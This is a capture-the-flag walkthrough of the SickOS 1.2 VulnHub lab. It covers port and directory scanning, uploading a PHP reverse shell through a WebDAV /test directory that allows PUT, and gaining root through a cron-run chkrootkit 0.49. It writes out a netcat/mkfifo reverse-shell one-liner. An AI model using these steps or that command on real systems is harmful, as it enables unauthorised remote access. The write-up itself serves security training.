SickOS 1.2 - VulnHub VM Challenge

How to crack SickOS1.2 VM lab without Metasploit.


  • Chkrootkit 0.49
  • Privilege escalation using Cronjob.

Solved by: 01_susil

This is a Linux box with IP

Initial Analysis

Doing a Port scan nmap enumerator, Basic scan.


The system is running OpenSSH, web server lighttpd 1.4.28. Running a background check for known vulnerabilites.

Opening up the browser to check for more details.


There was nothing much information on this page. It contained only a meme

Opening up the Dirb Web Content Scanner to check for more information.


/test/ directory has been found from Dirb scan.

Let’s Checkout the /test directory.


It looks like a WebDAV directory. WebDAV is a long-standing protocol that enables a webserver to act as a fileserver and support collaborative authoring of content on the web.


PUT method is meant for “uploading” stuff to a particular URI, or overwriting what is already in that URI.
Here the PUT method is allowed! Uploading a php-reverse-shell should work.



Netcat is a utility which reads and writes data across network connections using TCP or UDP protocol.
Setup Netcat listener to spawn a reverse shell.


We don’t have root access till now, let’s list the directory.



Checking cron jobs, found the chkrootkit and its version.
Cron job is a time-based job scheduler. Users use cron to schedule jobs to run periodically at fixed times.
Chkrootkit is a shell script that checks system binaries for rootkit modification.


Create a file named Update which contained

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f

rm removes /tmp/f
mkfifo creates a fifo file with name pathname /tmp/f
2>&1 command pipe stdout and stderr to command.
nc is netcat tool to spawn a reverse shell.
Now to make update file as executed file I’m using “ chmod 777 update “.

Now cronjob will execute the update file every minute. Setup a netcat listener on port 443 which is mentioned in the update file.


And that’s how I solved SickOS 1.2!